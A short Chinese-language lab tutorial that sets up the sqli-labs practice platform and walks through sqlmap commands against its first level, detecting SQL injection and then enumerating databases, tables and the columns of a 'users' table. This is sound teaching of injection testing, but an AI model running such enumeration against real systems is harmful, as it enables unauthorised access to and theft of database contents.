搭建sql注入平台
这里选择的是sqli-labs
在windows上搭建一下,具体过程就不多介绍了
搭建完毕
点击第一关
sql入门
查询是否存在注入
sqlmap -u http://192.168.1.100/Less-1/?id=1
注:注入点后面的参数大于等于2个时,url需要加双引号
两个提示,提示1:可能存在注入,数据库可能是Mysql;提示2:可能存在XSS
直接回车
反馈回来的信息
查询https网站
sqlmap -u https://192.168.1.100/Less-1/?id=1 --force-ssl
查询当前用户下的所有数据库
sqlmap -u http://192.168.1.100/Less-1/?id=1 --dbs
查询数据库中的表名
sqlmap -u http://192.168.1.100/Less-1/?id=1 -D security --tables
查询表中的字段名
sqlmap -u http://192.168.1.100/Less-1/?id=1 -D security -T users --columns